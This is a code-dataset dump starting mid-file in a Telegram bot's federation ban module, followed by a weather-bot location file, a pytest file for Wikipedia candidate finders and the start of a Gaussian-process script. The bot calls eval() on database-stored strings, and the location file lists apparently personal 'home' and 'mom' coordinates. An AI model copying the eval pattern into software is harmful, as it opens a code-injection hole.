int(cek.get(\"value\")):\n waktu = time.strftime(\"%H:%M:%S %d/%m/%Y\",\n time.localtime(cek.get(\"value\")))\n update.effective_message.reply_text(\n \"You can get your data once every 30 minutes!\\nYou can get data again at `{}`\" .format(waktu),\n parse_mode=ParseMode.MARKDOWN,\n )\n return\n if str(user.id) not in str(OWNER_ID):\n put_chat(chat.id, new_jam, chat_data)\n else:\n if str(user.id) not in str(OWNER_ID):\n put_chat(chat.id, new_jam, chat_data)\n # if int(int(msg.reply_to_message.document.file_size)/1024) >= 200:\n # \tmsg.reply_text(\"This file is too big!\")\n # \treturn\n success = 0\n failed = 0\n try:\n file_info = context.bot.get_file(\n msg.reply_to_message.document.file_id)\n except BadRequest:\n msg.reply_text(\n \"Try downloading and re-uploading the file, this one seems broken!\"\n )\n return\n fileformat = msg.reply_to_message.document.file_name.split(\".\")[-1]\n if fileformat == \"json\":\n multi_fed_id = []\n multi_import_userid = []\n multi_import_firstname = []\n multi_import_lastname = []\n multi_import_username = []\n multi_import_reason = []\n with BytesIO() as file:\n file_info.download(out=file)\n file.seek(0)\n reading = file.read().decode(\"UTF-8\")\n splitting = reading.split(\"\\n\")\n for x in splitting:\n if x == \"\":\n continue\n try:\n data = json.loads(x)\n except json.decoder.JSONDecodeError:\n failed += 1\n continue\n try:\n # Make sure it int\n import_userid = int(data[\"user_id\"])\n import_firstname = str(data[\"first_name\"])\n import_lastname = str(data[\"last_name\"])\n import_username = str(data[\"user_name\"])\n import_reason = str(data[\"reason\"])\n except ValueError:\n failed += 1\n continue\n # Checking user\n if int(import_userid) == context.bot.id:\n failed += 1\n continue\n if is_user_fed_owner(fed_id, import_userid) is True:\n failed += 1\n continue\n if is_user_fed_admin(fed_id, import_userid) is True:\n failed += 1\n continue\n if str(import_userid) == str(OWNER_ID):\n failed += 1\n continue\n if int(import_userid) in OWNER_ID:\n failed += 1\n continue\n\n multi_fed_id.append(fed_id)\n multi_import_userid.append(str(import_userid))\n multi_import_firstname.append(import_firstname)\n multi_import_lastname.append(import_lastname)\n multi_import_username.append(import_username)\n multi_import_reason.append(import_reason)\n success += 1\n sql.multi_fban_user(\n multi_fed_id,\n multi_import_userid,\n multi_import_firstname,\n multi_import_lastname,\n multi_import_username,\n multi_import_reason,\n )\n text = \"Blocks were successfully imported. {} people are blocked.\".format(\n success)\n if failed >= 1:\n text += \" {} Failed to import.\".format(failed)\n get_fedlog = sql.get_fed_log(fed_id)\n if get_fedlog:\n if eval(get_fedlog):\n teks = \"Fed *{}* has successfully imported data. {} banned.\".format(\n getfed[\"fname\"], success)\n if failed >= 1:\n teks += \" {} Failed to import.\".format(failed)\n context.bot.send_message(get_fedlog,\n teks,\n parse_mode=\"markdown\")\n elif fileformat == \"csv\":\n multi_fed_id = []\n multi_import_userid = []\n multi_import_firstname = []\n multi_import_lastname = []\n multi_import_username = []\n multi_import_reason = []\n file_info.download(\"fban_{}.csv\".format(\n msg.reply_to_message.document.file_id))\n with open(\n \"fban_{}.csv\".format(\n msg.reply_to_message.document.file_id),\n \"r\",\n encoding=\"utf8\",\n ) as csvFile:\n reader = csv.reader(csvFile)\n for data in reader:\n try:\n import_userid = int(data[0]) # Make sure it int\n import_firstname = str(data[1])\n import_lastname = str(data[2])\n import_username = str(data[3])\n import_reason = str(data[4])\n except ValueError:\n failed += 1\n continue\n # Checking user\n if int(import_userid) == context.bot.id:\n failed += 1\n continue\n if is_user_fed_owner(fed_id, import_userid) is True:\n failed += 1\n continue\n if is_user_fed_admin(fed_id, import_userid) is True:\n failed += 1\n continue\n if str(import_userid) == str(OWNER_ID):\n failed += 1\n continue\n if int(import_userid) in OWNER_ID:\n failed += 1\n continue\n\n multi_fed_id.append(fed_id)\n multi_import_userid.append(str(import_userid))\n multi_import_firstname.append(import_firstname)\n multi_import_lastname.append(import_lastname)\n multi_import_username.append(import_username)\n multi_import_reason.append(import_reason)\n success += 1\n # t = ThreadWithReturnValue(target=sql.fban_user, args=(fed_id, str(import_userid), import_firstname, import_lastname, import_username, import_reason,))\n # t.start()\n sql.multi_fban_user(\n multi_fed_id,\n multi_import_userid,\n multi_import_firstname,\n multi_import_lastname,\n multi_import_username,\n multi_import_reason,\n )\n csvFile.close()\n os.remove(\"fban_{}.csv\".format(\n msg.reply_to_message.document.file_id))\n text = \"Files were imported successfully. {} people banned.\".format(\n success)\n if failed >= 1:\n text += \" {} Failed to import.\".format(failed)\n get_fedlog = sql.get_fed_log(fed_id)\n if get_fedlog:\n if eval(get_fedlog):\n teks = \"Fed *{}* has successfully imported data. {} banned.\".format(\n getfed[\"fname\"], success)\n if failed >= 1:\n teks += \" {} Failed to import.\".format(failed)\n context.bot.send_message(get_fedlog,\n teks,\n parse_mode=\"markdown\")\n else:\n send_message(update.effective_message,\n \"This file is not supported.\")\n return\n send_message(update.effective_message, text)\n\n\n@run_async\ndef del_fed_button(update, context):\n query = update.callback_query\n fed_id = query.data.split(\"_\")[1]\n\n if fed_id == \"cancel\":\n query.message.edit_text(\"Federation deletion cancelled\")\n return\n\n getfed = sql.get_fed_info(fed_id)\n if getfed:\n delete = sql.del_fed(fed_id)\n if delete:\n query.message.edit_text(\n \"You have removed your Federation! Now all the Groups that are connected with `{}` do not have a Federation.\" .format(\n getfed[\"fname\"]), parse_mode=\"markdown\", )\n\n\n@run_async\ndef fed_stat_user(update, context):\n user = update.effective_user # type: Optional[User]\n msg = update.effective_message # type: Optional[Message]\n args = context.args\n\n if args:\n if args[0].isdigit():\n user_id = args[0]\n else:\n user_id = extract_user(msg, args)\n else:\n user_id = extract_user(msg, args)\n\n if user_id:\n if len(args) == 2 and args[0].isdigit():\n fed_id = args[1]\n user_name, reason, fbantime = sql.get_user_fban(\n fed_id, str(user_id))\n if fbantime:\n fbantime = time.strftime(\"%d/%m/%Y\", time.localtime(fbantime))\n else:\n fbantime = \"Unavaiable\"\n if user_name is False:\n send_message(\n update.effective_message,\n \"Fed {} not found!\".format(fed_id),\n parse_mode=\"markdown\",\n )\n return\n if user_name == \"\" or user_name is None:\n user_name = \"He/she\"\n if not reason:\n send_message(\n update.effective_message,\n \"{} is not banned in this federation!\".format(user_name),\n )\n else:\n teks = \"{} banned in this federation because:\\n`{}`\\n*Banned at:* `{}`\".format(\n user_name, reason, fbantime)\n send_message(update.effective_message,\n teks,\n parse_mode=\"markdown\")\n return\n user_name, fbanlist = sql.get_user_fbanlist(str(user_id))\n if user_name == \"\":\n try:\n user_name = context.bot.get_chat(user_id).first_name\n except BadRequest:\n user_name = \"He/she\"\n if user_name == \"\" or user_name is None:\n user_name = \"He/she\"\n if len(fbanlist) == 0:\n send_message(\n update.effective_message,\n \"{} is not banned in any federation!\".format(user_name),\n )\n return\n teks = \"{} has been banned in this federation:\\n\".format(user_name)\n for x in fbanlist:\n teks += \"- `{}`: {}\\n\".format(x[0], x[1][:20])\n teks += \"\\nIf you want to find out more about the reasons for Fedban specifically, use /fbanstat \"\n send_message(update.effective_message, teks, parse_mode=\"markdown\")\n\n elif not msg.reply_to_message and not args:\n user_id = msg.from_user.id\n user_name, fbanlist = sql.get_user_fbanlist(user_id)\n if user_name == \"\":\n user_name = msg.from_user.first_name\n if len(fbanlist) == 0:\n send_message(\n update.effective_message,\n \"{} is not banned in any federation!\".format(user_name),\n )\n else:\n teks = \"{} has been banned in this federation:\\n\".format(user_name)\n for x in fbanlist:\n teks += \"- `{}`: {}\\n\".format(x[0], x[1][:20])\n teks += \"\\nIf you want to find out more about the reasons for Fedban specifically, use /fbanstat \"\n send_message(update.effective_message, teks, parse_mode=\"markdown\")\n\n else:\n fed_id = args[0]\n fedinfo = sql.get_fed_info(fed_id)\n if not fedinfo:\n send_message(update.effective_message,\n \"Fed {} not found!\".format(fed_id))\n return\n name, reason, fbantime = sql.get_user_fban(fed_id, msg.from_user.id)\n if fbantime:\n fbantime = time.strftime(\"%d/%m/%Y\", time.localtime(fbantime))\n else:\n fbantime = \"Unavaiable\"\n if not name:\n name = msg.from_user.first_name\n if not reason:\n send_message(\n update.effective_message,\n \"{} is not banned in this federation\".format(name),\n )\n return\n send_message(\n update.effective_message,\n \"{} banned in this federation because:\\n`{}`\\n*Banned at:* `{}`\".\n format(name, reason, fbantime),\n parse_mode=\"markdown\",\n )\n\n\n@run_async\ndef set_fed_log(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n args = context.args\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n if args:\n fedinfo = sql.get_fed_info(args[0])\n if not fedinfo:\n send_message(update.effective_message,\n \"This Federation does not exist!\")\n return\n isowner = is_user_fed_owner(args[0], user.id)\n if not isowner:\n send_message(\n update.effective_message,\n \"Only federation creator can set federation logs.\",\n )\n return\n setlog = sql.set_fed_log(args[0], chat.id)\n if setlog:\n send_message(\n update.effective_message,\n \"Federation log `{}` has been set to {}\".format(\n fedinfo[\"fname\"], chat.title),\n parse_mode=\"markdown\",\n )\n else:\n send_message(update.effective_message,\n \"You have not provided your federated ID!\")\n\n\n@run_async\ndef unset_fed_log(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n msg = update.effective_message # type: Optional[Message]\n args = context.args\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n if args:\n fedinfo = sql.get_fed_info(args[0])\n if not fedinfo:\n send_message(update.effective_message,\n \"This Federation does not exist!\")\n return\n isowner = is_user_fed_owner(args[0], user.id)\n if not isowner:\n send_message(\n update.effective_message,\n \"Only federation creator can set federation logs.\",\n )\n return\n setlog = sql.set_fed_log(args[0], None)\n if setlog:\n send_message(\n update.effective_message,\n \"Federation log `{}` has been revoked on {}\".format(\n fedinfo[\"fname\"], chat.title),\n parse_mode=\"markdown\",\n )\n else:\n send_message(update.effective_message,\n \"You have not provided your federated ID!\")\n\n\n@run_async\ndef subs_feds(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n msg = update.effective_message # type: Optional[Message]\n args = context.args\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n fed_id = sql.get_fed_id(chat.id)\n fedinfo = sql.get_fed_info(fed_id)\n\n if not fed_id:\n send_message(update.effective_message,\n \"This chat is not in any federation!\")\n return\n\n if is_user_fed_owner(fed_id, user.id) is False:\n send_message(update.effective_message, \"Only fed owner can do this!\")\n return\n\n if args:\n getfed = sql.search_fed_by_id(args[0])\n if getfed is False:\n send_message(update.effective_message,\n \"Please enter a valid federation id.\")\n return\n subfed = sql.subs_fed(args[0], fed_id)\n if subfed:\n send_message(\n update.effective_message,\n \"Federation `{}` has subscribe the federation `{}`. Every time there is a Fedban from that federation, this federation will also banned that user.\" .format(\n fedinfo[\"fname\"],\n getfed[\"fname\"]),\n parse_mode=\"markdown\",\n )\n get_fedlog = sql.get_fed_log(args[0])\n if get_fedlog:\n if int(get_fedlog) != int(chat.id):\n context.bot.send_message(\n get_fedlog,\n \"Federation `{}` has subscribe the federation `{}`\".\n format(fedinfo[\"fname\"], getfed[\"fname\"]),\n parse_mode=\"markdown\",\n )\n else:\n send_message(\n update.effective_message,\n \"Federation `{}` already subscribe the federation `{}`.\".\n format(fedinfo[\"fname\"], getfed[\"fname\"]),\n parse_mode=\"markdown\",\n )\n else:\n send_message(update.effective_message,\n \"You have not provided your federated ID!\")\n\n\n@run_async\ndef unsubs_feds(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n msg = update.effective_message # type: Optional[Message]\n args = context.args\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n fed_id = sql.get_fed_id(chat.id)\n fedinfo = sql.get_fed_info(fed_id)\n\n if not fed_id:\n send_message(update.effective_message,\n \"This chat is not in any federation!\")\n return\n\n if is_user_fed_owner(fed_id, user.id) is False:\n send_message(update.effective_message, \"Only fed owner can do this!\")\n return\n\n if args:\n getfed = sql.search_fed_by_id(args[0])\n if getfed is False:\n send_message(update.effective_message,\n \"Please enter a valid federation id.\")\n return\n subfed = sql.unsubs_fed(args[0], fed_id)\n if subfed:\n send_message(\n update.effective_message,\n \"Federation `{}` now unsubscribe fed `{}`.\".format(\n fedinfo[\"fname\"], getfed[\"fname\"]),\n parse_mode=\"markdown\",\n )\n get_fedlog = sql.get_fed_log(args[0])\n if get_fedlog:\n if int(get_fedlog) != int(chat.id):\n context.bot.send_message(\n get_fedlog,\n \"Federation `{}` has unsubscribe fed `{}`.\".format(\n fedinfo[\"fname\"], getfed[\"fname\"]),\n parse_mode=\"markdown\",\n )\n else:\n send_message(\n update.effective_message,\n \"Federation `{}` is not subscribing `{}`.\".format(\n fedinfo[\"fname\"], getfed[\"fname\"]),\n parse_mode=\"markdown\",\n )\n else:\n send_message(update.effective_message,\n \"You have not provided your federated ID!\")\n\n\n@run_async\ndef get_myfedsubs(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n msg = update.effective_message # type: Optional[Message]\n args = context.args\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n fed_id = sql.get_fed_id(chat.id)\n fedinfo = sql.get_fed_info(fed_id)\n\n if not fed_id:\n send_message(update.effective_message,\n \"This chat is not in any federation!\")\n return\n\n if is_user_fed_owner(fed_id, user.id) is False:\n send_message(update.effective_message, \"Only fed owner can do this!\")\n return\n\n getmy = sql.get_mysubs(fed_id)\n\n if getmy is None:\n send_message(\n update.effective_message,\n \"Federation `{}` is not subscribing any federation.\".format(\n fedinfo[\"fname\"]),\n parse_mode=\"markdown\",\n )\n return\n listfed = \"Federation `{}` is subscribing federation:\\n\".format(\n fedinfo[\"fname\"])\n for x in getmy:\n listfed += \"- `{}`\\n\".format(x)\n listfed += (\n \"\\nTo get fed info `/fedinfo `. To unsubscribe `/unsubfed `.\"\n )\n send_message(update.effective_message, listfed, parse_mode=\"markdown\")\n\n\n@run_async\ndef get_myfeds_list(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n msg = update.effective_message # type: Optional[Message]\n args = context.args\n\n fedowner = sql.get_user_owner_fed_full(user.id)\n if fedowner:\n text = \"*You are owner of feds:\\n*\"\n for f in fedowner:\n text += \"- `{}`: *{}*\\n\".format(f[\"fed_id\"], f[\"fed\"][\"fname\"])\n else:\n text = \"*You are not have any feds!*\"\n send_message(update.effective_message, text, parse_mode=\"markdown\")\n\n\ndef is_user_fed_admin(fed_id, user_id):\n fed_admins = sql.all_fed_users(fed_id)\n if fed_admins is False:\n return False\n if int(user_id) in fed_admins or int(user_id) == OWNER_ID:\n return True\n return False\n\n\ndef is_user_fed_owner(fed_id, user_id):\n getsql = sql.get_fed_info(fed_id)\n if getsql is False:\n return False\n getfedowner = eval(getsql[\"fusers\"])\n if getfedowner is None or getfedowner is False:\n return False\n getfedowner = getfedowner[\"owner\"]\n if str(user_id) == getfedowner or int(user_id) == OWNER_ID:\n return True\n return False\n\n\n@run_async\ndef welcome_fed(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n\n fed_id = sql.get_fed_id(chat.id)\n fban, fbanreason, fbantime = sql.get_fban_user(fed_id, user.id)\n if fban:\n update.effective_message.reply_text(\n \"This user is banned in current federation! I will remove him.\")\n context.bot.kick_chat_member(chat.id, user.id)\n return True\n return False\n\n\ndef __stats__():\n all_fbanned = sql.get_all_fban_users_global()\n all_feds = sql.get_all_feds_users_global()\n return \"× {} users banned, in {} federations\".format(\n len(all_fbanned), len(all_feds))\n\n\ndef __user_info__(user_id, chat_id):\n fed_id = sql.get_fed_id(chat_id)\n if fed_id:\n fban, fbanreason, fbantime = sql.get_fban_user(fed_id, user_id)\n info = sql.get_fed_info(fed_id)\n infoname = info[\"fname\"]\n\n if int(info[\"owner\"]) == user_id:\n text = (\n \"This user is the owner of the current Federation: {}.\".\n format(infoname))\n elif is_user_fed_admin(fed_id, user_id):\n text = (\n \"This user is the admin of the current Federation: {}.\".\n format(infoname))\n\n elif fban:\n text = \"Banned in current Fed: Yes\"\n text += \"\\nReason: {}\".format(fbanreason)\n else:\n text = \"Banned in current Fed: No\"\n else:\n text = \"\"\n return text\n\n\n# Temporary data\ndef put_chat(chat_id, value, chat_data):\n # print(chat_data)\n if value is False:\n status = False\n else:\n status = True\n chat_data[chat_id] = {\"federation\": {\"status\": status, \"value\": value}}\n\n\ndef get_chat(chat_id, chat_data):\n # print(chat_data)\n try:\n value = chat_data[chat_id][\"federation\"]\n return value\n except KeyError:\n return {\"status\": False, \"value\": False}\n\n\n__mod_name__ = \"Federation 🔗\"\n\n__help__ = \"\"\"\nHere is the help for the Federation 🔗 module:\n\nAh, group management. Everything is fun, until the spammer starts entering your group, and you have to block it. Then you need to start banning more, and more, and it hurts.\nBut then you have many groups, and you don't want this spammer to be in one of your groups - how can you deal? Do you have to manually block it, in all your groups?\nNo longer! With Federation, you can make a ban in one chat overlap with all other chats.\nYou can even designate admin federations, so your trusted admin can ban all the chats you want to protect.\n\nCommands Available:\n - /newfed : Create a new Federation with the name given. Users are only allowed to have one Federation. This method can also be used to rename the Federation. (max. 64 characters)\n - /delfed: Delete your Federation, and any information related to it. Will not cancel blocked users.\n - /fedinfo : Information about the specified Federation.\n - /joinfed : Join the current chat to the Federation. Only chat owners can do this. Every chat can only be in one Federation.\n - /leavefed : Leave the Federation given. Only chat owners can do this.\n - /fpromote : Promote Users to give fed admin. Fed owner only.\n - /fdemote : Drops the User from the admin Federation to a normal User. Fed owner only.\n - /fban : Prohibits users from all federations where this chat takes place, and executors have control over.\n - /unfban : Cancel User from all federations where this chat takes place, and that the executor has control over.\n - /setfrules: Arrange Federation rules.\n - /frules: See Federation regulations.\n - /chatfed: See the Federation in the current chat.\n - /fedadmins: Show Federation admin.\n - /fbanlist: Displays all users who are victimized at the Federation at this time.\n - /fednotif : Federation settings not in PM when there are users who are fban / unfban.\n - /fedchats: Get all the chats that are connected in the Federation.\n\"\"\"\n\nNEW_FED_HANDLER = CommandHandler(\"newfed\", new_fed)\nDEL_FED_HANDLER = CommandHandler(\"delfed\", del_fed, pass_args=True)\nJOIN_FED_HANDLER = CommandHandler(\"joinfed\", join_fed, pass_args=True)\nLEAVE_FED_HANDLER = CommandHandler(\"leavefed\", leave_fed, pass_args=True)\nPROMOTE_FED_HANDLER = CommandHandler(\"fpromote\", user_join_fed, pass_args=True)\nDEMOTE_FED_HANDLER = CommandHandler(\"fdemote\", user_demote_fed, pass_args=True)\nINFO_FED_HANDLER = CommandHandler(\"fedinfo\", fed_info, pass_args=True)\nBAN_FED_HANDLER = CommandHandler([\"fban\", \"fedban\"], fed_ban, pass_args=True)\nUN_BAN_FED_HANDLER = CommandHandler(\"unfban\", unfban, pass_args=True)\nFED_BROADCAST_HANDLER = CommandHandler(\"fbroadcast\",\n fed_broadcast,\n pass_args=True)\nFED_SET_RULES_HANDLER = CommandHandler(\"setfrules\", set_frules, pass_args=True)\nFED_GET_RULES_HANDLER = CommandHandler(\"frules\", get_frules, pass_args=True)\nFED_CHAT_HANDLER = CommandHandler(\"chatfed\", fed_chat, pass_args=True)\nFED_ADMIN_HANDLER = CommandHandler(\"fedadmins\", fed_admin, pass_args=True)\nFED_USERBAN_HANDLER = CommandHandler(\"fbanlist\",\n fed_ban_list,\n pass_args=True,\n pass_chat_data=True)\nFED_NOTIF_HANDLER = CommandHandler(\"fednotif\", fed_notif, pass_args=True)\nFED_CHATLIST_HANDLER = CommandHandler(\"fedchats\", fed_chats, pass_args=True)\nFED_IMPORTBAN_HANDLER = CommandHandler(\"importfbans\",\n fed_import_bans,\n pass_chat_data=True)\nFEDSTAT_USER = CommandHandler([\"fedstat\", \"fbanstat\"],\n fed_stat_user,\n pass_args=True)\nSET_FED_LOG = CommandHandler(\"setfedlog\", set_fed_log, pass_args=True)\nUNSET_FED_LOG = CommandHandler(\"unsetfedlog\", unset_fed_log, pass_args=True)\nSUBS_FED = CommandHandler(\"subfed\", subs_feds, pass_args=True)\nUNSUBS_FED = CommandHandler(\"unsubfed\", unsubs_feds, pass_args=True)\nMY_SUB_FED = CommandHandler(\"fedsubs\", get_myfedsubs, pass_args=True)\nMY_FEDS_LIST = CommandHandler(\"myfeds\", get_myfeds_list)\n\nDELETEBTN_FED_HANDLER = CallbackQueryHandler(del_fed_button, pattern=r\"rmfed_\")\n\ndispatcher.add_handler(NEW_FED_HANDLER)\ndispatcher.add_handler(DEL_FED_HANDLER)\ndispatcher.add_handler(JOIN_FED_HANDLER)\ndispatcher.add_handler(LEAVE_FED_HANDLER)\ndispatcher.add_handler(PROMOTE_FED_HANDLER)\ndispatcher.add_handler(DEMOTE_FED_HANDLER)\ndispatcher.add_handler(INFO_FED_HANDLER)\ndispatcher.add_handler(BAN_FED_HANDLER)\ndispatcher.add_handler(UN_BAN_FED_HANDLER)\ndispatcher.add_handler(FED_BROADCAST_HANDLER)\ndispatcher.add_handler(FED_SET_RULES_HANDLER)\ndispatcher.add_handler(FED_GET_RULES_HANDLER)\ndispatcher.add_handler(FED_CHAT_HANDLER)\ndispatcher.add_handler(FED_ADMIN_HANDLER)\ndispatcher.add_handler(FED_USERBAN_HANDLER)\ndispatcher.add_handler(FED_NOTIF_HANDLER)\ndispatcher.add_handler(FED_CHATLIST_HANDLER)\ndispatcher.add_handler(FED_IMPORTBAN_HANDLER)\ndispatcher.add_handler(FEDSTAT_USER)\ndispatcher.add_handler(SET_FED_LOG)\ndispatcher.add_handler(UNSET_FED_LOG)\ndispatcher.add_handler(SUBS_FED)\ndispatcher.add_handler(UNSUBS_FED)\ndispatcher.add_handler(MY_SUB_FED)\ndispatcher.add_handler(MY_FEDS_LIST)\n\ndispatcher.add_handler(DELETEBTN_FED_HANDLER)\n\ndispatcher.add_handler(MY_FEDS_LIST)\n\ndispatcher.add_handler(DELETEBTN_FED_HANDLER)\n","repo_name":"gogeta0sama/missBot","sub_path":"julia/modules/feds.py","file_name":"feds.py","file_ext":"py","file_size_in_byte":86793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"21120182518","text":"def get_location(place='home'):\n locations = {\n 'home': {'lat': 34.718553, 'lon': -86.778150, 'label': 'Madison, AL'},\n 'mom': {'lat': 34.807048, 'lon': -92.282116, 'label': 'North Little Rock, AR'},\n 'test': {'lat': 35.745894, 'lon': -89.531717, 'label': 'Some random place with interesting weather'},\n }\n\n try:\n lat = locations[place]['lat']\n lon = locations[place]['lon']\n label = locations[place]['label']\n except KeyError:\n print('*** Location not recognized. ***')\n exit()\n\n return lat, lon, label\n","repo_name":"bakerbug/weather-bot","sub_path":"location_data.py","file_name":"location_data.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"10278226232","text":"import pytest\nimport responses\nimport requests\nimport urllib\nimport json\nimport re\n\nfrom recommendation.api import candidate_finders\n\nPAGEVIEW_RESPONSE = {\n 'items': [\n {\n 'access': 'all-access',\n 'month': '08',\n 'day': '16',\n 'year': '2016',\n 'project': 'en.wikipedia',\n 'articles': [\n {'article': 'Sample_A', 'rank': 1, 'views': 20},\n {'article': 'Sample_B', 'rank': 2, 'views': 19},\n {'article': 'Sample_C', 'rank': 3, 'views': 18},\n {'article': 'Sample_D', 'rank': 4, 'views': 17},\n {'article': 'Sample_E', 'rank': 5, 'views': 16},\n {'article': 'Sample_F', 'rank': 6, 'views': 15},\n {'article': 'Sample_G', 'rank': 7, 'views': 14},\n {'article': 'Sample_H', 'rank': 8, 'views': 13},\n {'article': 'Sample_I', 'rank': 9, 'views': 12},\n {'article': 'Sample_J', 'rank': 10, 'views': 11},\n {'article': 'Sample_K', 'rank': 11, 'views': 10},\n {'article': 'Sample_L', 'rank': 12, 'views': 9}\n ]\n }\n ]\n}\n\nBAD_PAGEVIEW_RESPONSE = {\n 'detail': ('The date(s) you used are valid, but we either do not have data for those date(s), or the project you '\n 'asked for is not loaded yet. Please check https://wikimedia.org/api/rest_v1/?doc for more '\n 'information.'),\n 'uri': '/analytics.wikimedia.org/v1/pageviews/top/qqq.wikipedia/all-access/2016/08/16',\n 'type': 'https://restbase.org/errors/not_found',\n 'method': 'get',\n 'title': 'Not found.'\n}\n\nMORELIKE_RESPONSE = {\n 'batchcomplete': '',\n 'query': {\n 'searchinfo': {'totalhits': 100},\n 'search': [\n {'ns': 0, 'wordcount': 1001, 'title': 'A'},\n {'ns': 0, 'wordcount': 1002, 'title': 'B'},\n {'ns': 0, 'wordcount': 1003, 'title': 'C'},\n {'ns': 0, 'wordcount': 1004, 'title': 'D'},\n {'ns': 0, 'wordcount': 1005, 'title': 'E'},\n {'ns': 0, 'wordcount': 1006, 'title': 'F'},\n {'ns': 0, 'wordcount': 1007, 'title': 'G'},\n {'ns': 0, 'wordcount': 1008, 'title': 'H'},\n {'ns': 0, 'wordcount': 1009, 'title': 'I'},\n {'ns': 0, 'wordcount': 1010, 'title': 'J'},\n {'ns': 0, 'wordcount': 1011, 'title': 'K'},\n {'ns': 0, 'wordcount': 1012, 'title': 'L'}\n ]\n },\n 'continue': {'sroffset': 12, 'continue': '-||'}\n}\n\nEMPTY_WIKI_RESPONSE = {\n 'batchcomplete': '',\n 'query': {\n 'searchinfo': {'totalhits': 0},\n 'search': []\n }\n}\n\n\ndef get_good_response(finder):\n finder_type = type(finder)\n if finder_type is candidate_finders.PageviewCandidateFinder:\n return PAGEVIEW_RESPONSE\n if finder_type is candidate_finders.MorelikeCandidateFinder:\n return MORELIKE_RESPONSE\n return {}\n\n\ndef get_bad_response(finder):\n finder_type = type(finder)\n if finder_type is candidate_finders.PageviewCandidateFinder:\n return BAD_PAGEVIEW_RESPONSE\n return {}\n\n\ndef add_response(body, status):\n responses.add(responses.GET, re.compile(r'http://localhost.'), body=body, status=status,\n content_type='application/json')\n\n\n@pytest.fixture(params=[\n candidate_finders.PageviewCandidateFinder,\n candidate_finders.MorelikeCandidateFinder\n])\ndef finder(request):\n return request.param()\n\n\n@pytest.mark.parametrize('count', [\n 0,\n 10\n])\ndef test_finder_returns_correct_amount(finder, count):\n add_response(json.dumps(get_good_response(finder)), 200)\n result = finder.get_candidates('en', None, count)\n assert count == len(result)\n\n\ndef test_inheritance(finder):\n assert isinstance(finder, candidate_finders.CandidateFinder)\n\n\ndef test_invalid_language_returns_empty_list(finder):\n add_response(body=json.dumps(get_bad_response(finder)), status=404)\n result = finder.get_candidates('qqq', None, 1)\n assert [] == result\n\n\n@pytest.mark.parametrize('body,status', [\n ('', 404),\n ('bad json', 200),\n (requests.HTTPError('mocked exception'), 0)\n])\ndef test_finder_returns_empty_list_when_requests_breaks(finder, body, status):\n add_response(body=body, status=status)\n assert [] == finder.get_candidates('en', None, 10)\n\n\ndef test_finder_calls_go_through_responses(finder):\n if type(finder) is candidate_finders.MorelikeCandidateFinder:\n # the number of calls is determined by other factors\n # that are tested more thoroughly elsewhere\n return\n add_response(body=json.dumps(get_good_response(finder)), status=200)\n finder.get_candidates('en', None, 10)\n assert 1 == len(responses.calls)\n url = responses.calls[0].request.url\n assert 'http://localhost' == url[:16]\n\n\n@pytest.mark.parametrize('seed,query,expected_calls,seed_response,morelike_response', [\n ('A', 'A', 2, MORELIKE_RESPONSE, MORELIKE_RESPONSE),\n ('B', 'A', 2, MORELIKE_RESPONSE, MORELIKE_RESPONSE),\n ('A', 'A', 1, EMPTY_WIKI_RESPONSE, MORELIKE_RESPONSE),\n ('Z', 'A', 3, MORELIKE_RESPONSE, EMPTY_WIKI_RESPONSE)\n])\ndef test_wiki_search_paths(seed, query, expected_calls, seed_response, morelike_response):\n \"\"\"\n This function is a mess, but it tries to build and execute the various paths through\n the morelike candidate finder\n\n :param seed: the user-supplied seed when performing a search\n :param query: after performing the first wiki_search, the top result is used for the subsequent searches\n this param is used to mock that value when building the url\n :param expected_calls: how many calls are expected to go through `responses`\n :param seed_response: the response to the initial seed_list query\n :param morelike_response: the response to the morelike query\n \"\"\"\n finder = candidate_finders.MorelikeCandidateFinder()\n search_pattern = dict(\n seed=(seed, 1, False, seed_response),\n morelike=(query, 10, True, morelike_response),\n fallback=(query, 10, False, MORELIKE_RESPONSE)\n )\n for query, count, morelike, response in search_pattern.values():\n url, params = candidate_finders.build_wiki_search('en', query, count, morelike)\n url += '?' + urllib.parse.urlencode(params)\n responses.add(responses.GET, url, json=response, status=200, match_querystring=True)\n finder.get_candidates('en', seed, 10)\n assert expected_calls == len(responses.calls)\n","repo_name":"wikimedia-research/translation-recs-app","sub_path":"recommendation/api/test/test_candidate_finders.py","file_name":"test_candidate_finders.py","file_ext":"py","file_size_in_byte":6473,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"96"} +{"seq_id":"3473231111","text":"import numpy as np\nfrom advectionGP.sensors import FixedSensorModel \nfrom advectionGP.kernels import EQ \nfrom advectionGP.wind import WindSimple\nfrom advectionGP.constraints import NonNegConstraint\nfrom advectionGP.kernels import meshgridndim\nfrom advectionGP.models.mesh_adr2d_model import AdjointAdvectionDiffusionReaction2DModel as PDEModel\n\nclass ModelSample():\n def __init__(self,ls=1,non_neg=False,N_feat=300):\n \"\"\"\n Generates a sample from our model (with different hyperparameters). Option available to restrict it to non-negative samples\n \"\"\"\n tlocL = np.linspace(1,9,10) # lower time\n xloc=np.linspace(1,9,5) # x locations\n yloc=np.linspace(1,9,5) # y locations\n sensN = len(xloc)*len(yloc) # total number of sensors 